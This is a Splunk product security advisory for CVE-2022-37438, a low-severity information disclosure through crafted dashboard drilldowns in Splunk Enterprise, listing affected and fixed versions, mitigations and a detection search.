Splunk / Product Security / SVD-2022-0802

Information disclosure via the dashboard drilldown in Splunk Enterprise

Advisory ID: SVD-2022-0802

Published: 2022-08-16

CVSSv3.1 Score: 2.6, Low

CWE: CWE-200

CVE ID: CVE-2022-37438

Last Update: 2022-08-16

CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

Bug ID: SPL-221531

Security Content: Splunk account discovery drilldown dashboard disclosure

Description

In Splunk Enterprise versions in the following table, an authenticated user can craft a dashboard that could potentially leak information (for example, username, email, and real name) about Splunk users, when visited by another user through the drilldown component. The vulnerability requires user access to create and share dashboards using Splunk Web. 


Solution

For Splunk Enterprise, upgrade versions to 8.1.11, 8.2.7.1, 9.0.1, or higher.

For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.


Product Status

ProductVersionComponentAffected VersionFixed Version
Splunk Enterprise8.1Splunk Web8.1.10 and lower8.1.11
Splunk Enterprise8.2Splunk Web8.2.0 to 8.2.78.2.7.1
Splunk Enterprise9.0Splunk Web9.0.09.0.1
Splunk Cloud Platform-Splunk Web8.2.2203.4 and lower9.0.2205


Mitigations and Workarounds

You can mitigate this vulnerability by configuring permissions for dashboards and the knowledge objects that drive them.


Detection

Splunk account discovery drilldown dashboard disclosure

This search uses REST functionality to query for dashboards with environment variables present in URL options that could potentially leak information about Splunk users. If an analyst sees results from this search we suggest investigating to determine if the disclosure of these environmental variables was intended.


Severity

Splunk rates the severity as Low, 2.6 with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N. If the Splunk Enterprise instance disabled Splunk Web, it is not impacted and the vulnerability is informational.


Acknowledgments

Eric LaMothe at Splunk